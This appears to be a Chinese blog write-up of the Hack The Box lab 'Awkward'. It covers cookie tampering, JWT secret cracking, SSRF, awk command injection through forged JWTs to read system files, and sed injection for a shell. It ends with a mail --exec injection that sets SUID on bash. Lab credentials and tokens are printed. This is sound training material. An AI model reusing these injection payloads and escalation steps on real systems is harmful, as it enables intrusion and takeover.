Hacking The Box----Awkward

已于 2023-05-12 13:34:27 修改
阅读量564 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 安全
于 2023-05-12 13:21:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41513009/article/details/130640147
版权

信息收集

nmap扫描,发现22号端口和80号端口打开,80号端口上运行着http服务器。访问ip后URL变为hat-valley.htb
在这里插入图片描述
修改/etc/hosts文件,添加10.10.11.185 hat-valley.htb,然后就能正常访问网站。可以看到是一家卖帽子的公司的网站,页面上有提示说即将开网店
在这里插入图片描述
接着用dirsearch扫描一下目录,发现js目录中可能有源码
在这里插入图片描述
进一步扫描js目录,发现app.js和custom.js
在这里插入图片描述
访问hat-valley.htb/js/app.js,发现目录/hr
在这里插入图片描述
除此之外发现一些api路由,包括/api/all-leave, /api/submit-leave, /api/login, /api/staff-details, and /api/store-status.
接着用wfuzz扫描一下子域名,发现store.hat-valley.htb,添加到/etc/hosts
在这里插入图片描述
访问store.hat-valley.htb,发现需要凭证
在这里插入图片描述

直接访问/hr/目录,发现有cookie: token=guest,修改guest为admin,成功登录dashboard
在这里插入图片描述

但是staff-details是空的,而且Online Store Status的状态是Down,查看一下网络请求,发现staff-details和store-status
在这里插入图片描述

访问api/staff-details,报错jwt-malformed
在这里插入图片描述

删除Cookie: token=guest后再次访问得到所有的员工信息:
在这里插入图片描述

爆破hash

用Crack station破解hash,成功爆破出其中一个hash值
在这里插入图片描述

登录

利用爆破得到密码chris123和搜集信息得到的用户名christopher.jones登录/hr
在这里插入图片描述

得到jwt token,尝试爆破用于JWT生成的secret
在这里插入图片描述

爆破JWT Secret

先用官方脚本将jwt转成john所能利用的格式

$ python3 jwt2john.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNocmlzdG9waGVyLmpvbmVzIiwiaWF0IjoxNjcxNTEzNjIyfQ.fdE8gDRe7UL30RNpzKWIBtsY_NUHUMdVTdzBkus1Jvo > jwt_hash.john
$ john -w=/usr/share/wordlists/rockyou.txt jwt_hash.john

转化脚本jwt2john.py如下:

#!/usr/bin/env python3
import sys

from binascii import hexlify
import base64

def base64url_decode(base64_str):
    size = len(base64_str) % 4
    if size == 2:
        base64_str += b'=='
    elif size == 3:
        base64_str += b'='
    elif size != 0:
        raise ValueError('Invalid base64 string')
    return base64.urlsafe_b64decode(base64_str)

def jwt2john(jwt):
    """
    Convert signature from base64 to hex, and separate it from the data by a #
    so that John can parse it.
    """
    jwt_bytes = jwt.encode('ascii')
    parts = jwt_bytes.split(b'.')

    data = parts[0] + b'.' + parts[1]
    signature = hexlify(base64url_decode(parts[2]))

    return (data + b'#' + signature).decode('ascii')


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: %s JWT" % sys.argv[0])
    else:
        john = jwt2john(sys.argv[1])
        print(john)

爆破得到jwt的密钥:123beany123

服务端请求伪造(SSRF)

登录发现的利用点还有一个:store-status,注意到其参数为url
在这里插入图片描述

尝试使用url="http://127.0.0.1:80"作为/api/store-status的参数,发现重定向到hat-valley.htb,因此可以确信是一个SSRF利用点

在这里插入图片描述

利用这个洞遍历一下端口,发现开了三个端口80、3002、8080
在这里插入图片描述

依次访问3002和8080,发现3002端口提供了API接口文档以及对应的源码
在这里插入图片描述

本地文件包含(LFI)

审计相关API的源码,发现一个本地文件包含漏洞:

app.get('/api/all-leave', (req, res) => {
  const user_token = req.cookies.token
  var authFailed = false
  var user = null
  if(user_token) {
    const decodedToken = jwt.verify(user_token, TOKEN_SECRET)
    if(!decodedToken.username) {
      authFailed = true
    }
    else {
      user = decodedToken.username
    }
  }
  if(authFailed) {
    return res.status(401).json({Error: "Invalid Token"})
  }
  if(!user) {
    return res.status(500).send("Invalid user")
  }
  const bad = [";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"]

  const badInUser = bad.some(char => user.includes(char));

  if(badInUser) {
    return res.status(500).send("Bad character detected.")
  }

  exec("awk '/" + user + "/' /var/www/private/leave_requests.csv", {encoding: 'binary', maxBuffer: 51200000}, (error, stdout, stderr) => {
    if(stdout) {
      return res.status(200).send(new Buffer(stdout, 'binary'));
    }
    if (error) {
      return res.status(500).send("Failed to retrieve leave requests")
    }
    if (stderr) {
      return res.status(500).send("Failed to retrieve leave requests")
    }
  })
})

awk后拼接变量user,user变量来自jwt token中的username,而我们已经得到了jwt生成token所使用的secret,因此我们可以伪造任何一个user的值

user = decodedToken.username
exec("awk '/" + user + "/' /var/www/private/leave_requests.csv", {encoding: 'binary', maxBuffer: 51200000}

假如传进去的token在解码后赋予user变量的值为/’ /etc/passwd ',那么这个命令会被拼接成:

exec("awk '//' /etc/passwd '/' /var/www/private/leave_requests.csv", {encoding: 'binary', maxBuffer: 51200000} <----- this is how query looks like when executing

在本地执行这个命令,发现输出了/etc/passwd的内容
在这里插入图片描述

使用https://jwt.io/来进行jwt token的伪造,填入爆破得到的secret,修改username为/’ /etc/passwd ',得到生成的token:
在这里插入图片描述

使用得到的token访问http://hat-valley.htb/api/all-leave

curl http://hat-valley.htb/api/all-leave --header "Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ldGMvcGFzc3dkICciLCJpYXQiOjE2NjcwMTcxNTd9.HKWzL6o9CamyDt0S-bxQyrKYEqQha_tDr1SfgSLcX7s" | grep -i /bin/bash

得到两个用户bean和christine
在这里插入图片描述

因为网站首页看到bean是管理员用户,因此查看bean的bashrc文件

curl http://hat-valley.htb/api/all-leave --header "Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vLmJhc2hyYyAnIiwiaWF0IjoxNjY3MDE3MTU3fQ._Rmh6a1R5H3g8JBg0hZg19LibMyWC93ArEm6wsepCsY"

在这里插入图片描述

注意到其中的backup_home.sh,尝试获取这个文件内容,发现文件/home/bean/Documents/backup/bean_backup_final.tar.gz
在这里插入图片描述

保存/home/bean/Documents/backup/bean_backup_final.tar.gz,并且用binwalk提取文件:

binwalk -eM bean_backup_final

得到用户bean的home目录
在这里插入图片描述

在文件.config/xpad/content-DS1ZS1找到用户bean的password:014mrbeanrules!#P
在这里插入图片描述

ssh登录bean,得到user.txt中的flag:
在这里插入图片描述

提权

之前扫描到的子域名store.hat-valley.htb需要凭证登录,观察到网站使用了nginx,现在通过bean用户在目录中找到/etc/nginx/conf.d/.htpasswd,得到用户名为admin,又由于用户中只有bean是admin权限,因此尝试使用bean的密码登录
在这里插入图片描述

成功登录
在这里插入图片描述

找到store源码目录
在这里插入图片描述

查看README.MD:
在这里插入图片描述

RCE

查看cart_actions.php

<?php

$STORE_HOME = "/var/www/store/";

//check for valid hat valley store item
function checkValidItem($filename) {
    if(file_exists($filename)) {
        $first_line = file($filename)[0];
        if(strpos($first_line, "***Hat Valley") !== FALSE) {
            return true;
        }
    }
    return false;
}

//add to cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'add_item' && $_POST['item'] && $_POST['user']) {
    $item_id = $_POST['item'];
    $user_id = $_POST['user'];
    $bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!

    foreach($bad_chars as $bad) {
        if(strpos($item_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    foreach($bad_chars as $bad) {
        if(strpos($user_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    if(checkValidItem("{$STORE_HOME}product-details/{$item_id}.txt")) {
        if(!file_exists("{$STORE_HOME}cart/{$user_id}")) {
            system("echo '***Hat Valley Cart***' > {$STORE_HOME}cart/{$user_id}");
        }
        system("head -2 {$STORE_HOME}product-details/{$item_id}.txt | tail -1 >> {$STORE_HOME}cart/{$user_id}");
        echo "Item added successfully!";
    }
    else {
        echo "Invalid item";
    }
    exit;
}

//delete from cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'delete_item' && $_POST['item'] && $_POST['user']) {
    $item_id = $_POST['item'];
    $user_id = $_POST['user'];
    $bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!

    foreach($bad_chars as $bad) {
        if(strpos($item_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    foreach($bad_chars as $bad) {
        if(strpos($user_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }
    if(checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
        system("sed -i '/item_id={$item_id}/d' {$STORE_HOME}cart/{$user_id}");
        echo "Item removed from cart";
    }
    else {
        echo "Invalid item";
    }
    exit;
}

//fetch from cart
if ($_SERVER['REQUEST_METHOD'] === 'GET' && $_GET['action'] === 'fetch_items' && $_GET['user']) {
    $html = "";
    $dir = scandir("{$STORE_HOME}cart");
    $files = array_slice($dir, 2);

    foreach($files as $file) {
        $user_id = substr($file, -18);
        if($user_id === $_GET['user'] && checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
            $product_file = fopen("{$STORE_HOME}cart/{$file}", "r");
            $details = array();
            while (($line = fgets($product_file)) !== false) {
                if(str_replace(array("\r", "\n"), '', $line) !== "***Hat Valley Cart***") { //don't include first line
                    array_push($details, str_replace(array("\r", "\n"), '', $line));
                }
            }
            foreach($details as $cart_item) {
                 $cart_items = explode("&", $cart_item);
                 for($x = 0; $x < count($cart_items); $x++) {
                      $cart_items[$x] = explode("=", $cart_items[$x]); //key and value as separate values in subarray
                 }
                 $html .= "<tr><td>{$cart_items[1][1]}</td><td>{$cart_items[2][1]}</td><td>{$cart_items[3][1]}</td><td><button data-id={$cart_items[0][1]} οnclick=\"removeFromCart(this, localStorage.getItem('user'))\" class='remove-item'>Remove</button></td></tr>";
            }
        }
    }
    echo $html;
    exit;
}
?>

审计源码发现sed命令用来删除cart文件数据,这个命令可用于RCE。为了能够删除cart里面的数据,先添加一个商品到购物车:
在这里插入图片描述

查看文件夹/var/www/store/cart发现多了一个文件
在这里插入图片描述

尝试编辑文件发现不行,删除文件并创建同名的,修改内容:
在这里插入图片描述

在tmp目录下创建shell.sh,同时赋予执行权限
接着在购物车中删除商品,用burp拦截报文,修改item为1’±e+“1e+/tmp/shell.sh”+/tmp/shell.sh+’
在这里插入图片描述

成功连接shell,权限为www-data
在这里插入图片描述

用pspy查看进程,发现inotifywait在监控leave_requests.csv,随便往leave_requests.csv中写入数据,发现2022/10/29 17:38:06 CMD: UID=0 PID=4698 | mail -s Leave Request: dedsec christine,因此可以借助mali程序来提权,创建一个setuid脚本

#!/bin/bash
chmod +s /bin/bash

然后往leave_requests.csv写入’" --exec=“!/tmp/priv.sh”',成功获取root权限

在这里插入图片描述

Silver Bullet
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hacking-the-Pentest-Tutor-Game
06-13
欢迎来到 Hacking - Pentest 导师游戏Hacking 是一款开源 Pentest 导师/培训游戏。 它模拟黑客/渗透测试的环境和过程。 这个游戏的目的是: 对人员、开发人员、运维人员和系统管理员进行有关黑客/渗透测试的教育; ...
Hacking and Development-开源
05-03
Hack&Dev项目的目标是将Linux引入基于PalmOS的手持设备。 当前,我们专注于基于Intel PXA和TI OMAP CPU的Palm / PalmOne手持设备。
离线图形化JWT加解密爆破工具JWT_GUI(ctfshowweb345——350)
Aiyflwoers的博客
07-24 2074
基于pyqt5和pyjwt实现的jwt加解密爆破一体化工具(ps:其实是水的python课设 ps2:发现最新用处,在全内网的线下赛中,收手机,出不去外网,出到jwt题目不会写脚本直接gg,该款工具就能派上用场hhh,也许有用~) 功能自己研究吧,图形化的应该一看就清楚。RS加密就是加密RS HS加密就是加密HS 注意算法选择和加密必须对应上,对应不上会报错。爆破:纯数字爆破不用设置字典,点击就可以,纯字母爆破其实是同目录下存在弱口令字典由于针对ctf比赛,一般我们是进行jwt篡改。
jwt爆破弱密钥
mingyqf的博客
04-27 1134
还未复现,看看思路 >pip3 install pyjwt >python3 crack.py import jwt import termcolor jwt_str = R'token' with open('/root/password.txt') as f: for line in f: key_ = line.strip() try: jwt.decode(jwt_str,verify=True,key=key_) print('\r','\bfound k
[JWT]JWT与爆破
最新发布
qq_55271156的博客
05-08 522
浅析JWT爆破的方法,适合小白食用
JWT认证漏洞总结
渗透测试研究中心
09-16 2027
通过对众多靶场案例漏洞测试,其中弱密钥、密钥泄露、不校验签名、信息泄露这些问题出现的居多,像更改 Header 不使用签名,暂时在实际生产环境中没遇到过。测试方面遇到 JWT可利用 jwt-tools 工具进行测试,将所有已知漏洞都测试一遍,避免遗漏。密钥。
绕过token进行密码爆破(包含python攻击脚本)
weixin_43960066的博客
07-30 1035
设置完毕以后开始爆破,时间取决于你的字典,如果是1个线程还没有办法爆破成功,可能是你的字典里面没有这个密码,在爆破页面我们将返回长度按照从大到小排列,就可以看到爆破成功的密码和其他的米密码长度不同。Token其实说的更通俗点可以叫暗号,在一些数据传输之前,要先进行暗号的核对,不同的暗号被授权不同的数据操作。6.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。选择需要抓取的Token的内容,同时设置和响应中相同的参数名字,点击OK。
Hacking-Android-and-IOS
03-08
简单的例子
Hacking-Security-Ebooks:排名前100的Hacking-Security-Ebooks(免费下载)
02-05
Hacking-Security-Ebooks:排名前100的Hacking-Security-Ebooks(免费下载)
SERVER-SIDE SWIFT - Hacking with Swift
05-07
Transfer your Swift skills to the server and learn to build awesome web apps, APIs, and websites all using Swift.
JWT攻击手册(附jwt_tool用法,爆破弱密钥等)
热门推荐
weixin_50464560的博客
10-01 1万+
转载至https://www.cnblogs.com/xiaozi/p/12005929.html JSON Web Token(JWT)对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等 ,可能还有更多!攻击令牌的过程显然取决于您正在测试的JWT配置和实现的情况,但是在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,篡改和签名,可能遇到已知的
细说——JWT攻击
LainWith的博客
01-05 5100
JSON Web Token (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户信息的声明,作为身份验证、会话处理和访问控制机制的一部分。与经典会话令牌不同,服务器需要的所有数据都存储在 JWT 本身的客户端中。这使得 JWT 成为高度分布式网站的热门选择,在这些网站中,用户需要与多个后端服务器无缝交互。它一般会放置在、**Cookie**或者请求体里面。
Python操作 JWT(python-jose包)、哈希(passlib包)、用户验证完整流程
Null的博客
01-18 6297
JWT 即JSON 网络令牌JWT(JSON Web Token) 是一种用于在身份提供者和服务提供者之间传递身份验证和授权数据的开放标准。JWT是一个JSON对象,其中包含了被签名的声明。这些声明可以是身份验证的声明、授权的声明等。JWT可以使用数字签名进行签名,以确保它不被篡改。JWT 是一种将 JSON 对象编码为没有空格,且难以理解的长字符串的标准。JWT 字符串没有加密,任何人都能用它恢复原始信息。jwt官网及在线解码但 JWT 使用了签名机制。接受令牌时,可以用签名校验令牌。
JWT介绍&空加密&暴破密钥&私钥泄露&密钥混淆&黑盒
qq_46081990的博客
12-21 2510
本文介绍了什么是 JWT,并将基于 Token 的验证方式与 Cookie+Session 的验证方式对比,介绍了 JWT 三个组成部分(Header、Claims、Signature)及 JWT 流量特征(eyJ)。 着重讲解了 JWT 的漏洞利用方式(空加密算法、爆破密钥、私钥泄露、密钥混淆),最后总结了黑盒下 JWT 漏洞的测试思路。
入坑 Hack The Box
LainWith的博客
10-19 9480
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
Hack The Box,一款有意思的渗透测试平台
阿道夫的博客
02-03 1425
Hack TheBox是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
Python:使用PyJWT实现JSON Web Tokens加密解密
彭世瑜的博客
07-26 4942
科普 JSON Web Token 入门教程 Json Web Token JWT三部分组成: (1)Header (2)Payload (3)Signature Base64URL 算法: Base64 有三个字符+、/和=,在 URL 里面有特殊含义, 所以要被替换掉:=被省略、+替换成-,/替换成_ 代码实现 github:https://github.com/jpadilla/pyjwt/...
Python 生成 JWT(json web token) 及 解析方式
python学习者的博客
12-23 3463
一.python 对于 jwt 的实现, 目前已经存在了一些第三方的库, 相信学习过 python 的程序猿都知道 itsdangerous 这个库了, 它的底层原理就是基于 jwt 进行实现的 这里需要进行提醒的是: itsdangerous (使用固定密钥/字符串进行加密, jwt 有多种加密方式, 这只是其中一种, 建议先去了解一下)所生成的 token 仍然是可以被破译从而看到 jwt 的...
暴力破解之token防爆破如何破解?
qq_34376868的博客
03-12 1万+
暴力破解 顾名思义是使用循环登陆尝试的方式尝试获取网站的用户和密码。 难点在于网站会通过验证码的方式阻止我们循环登陆尝试破解。 服务器验证码可以利用验证码刷新不及时的方式破解,前端代码我们可以对请求包修改删除验证码数据的方式绕过,但是token防爆破如何破解? 第一步还是抓取一个请求包 对包中变量进行分析 此处多出了一个taken变量选项 taken变量如何来的?多半和返回包有关 通过对返回...
car-hacking数据集
10-29
车辆黑客攻击数据集是一种包含有关车辆安全漏洞和潜在攻击手段的信息的数据集。这些数据被用于研究和理解车辆系统的脆弱性,以及如何保护车辆免受黑客攻击。 车辆黑客攻击数据集通常包括以下信息:车辆的软硬件配置、ECU(电子控制单元)的固件版本、网络通信协议、传感器数据、车辆控制指令、车辆行驶信息等。这些数据集经过严格筛选和标注,以确保研究人员和安全专家能够使用它们来了解和模拟车辆黑客攻击的情况。 这些数据集在汽车安全领域具有重要的研究价值。研究人员可以使用这些数据集来探索可能的攻击路径和漏洞,同时也可以评估车辆系统的安全性和防护机制。这些研究有助于促进车辆安全技术的发展和创新,保护车辆免受黑客攻击的威胁。 此外,车辆黑客攻击数据集还可以被安全产品和解决方案提供商用来测试自己的产品和系统。通过模拟真实的攻击场景,这些厂商可以评估其产品的效果和可靠性,改进并提高汽车系统的安全性。 总的来说,车辆黑客攻击数据集是一个重要的研究资源,可以帮助我们更好地理解和保护车辆免受黑客攻击的威胁。通过研究这些数据集,我们可以提高车辆系统的安全性,保障人们的行车安全和隐私保护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值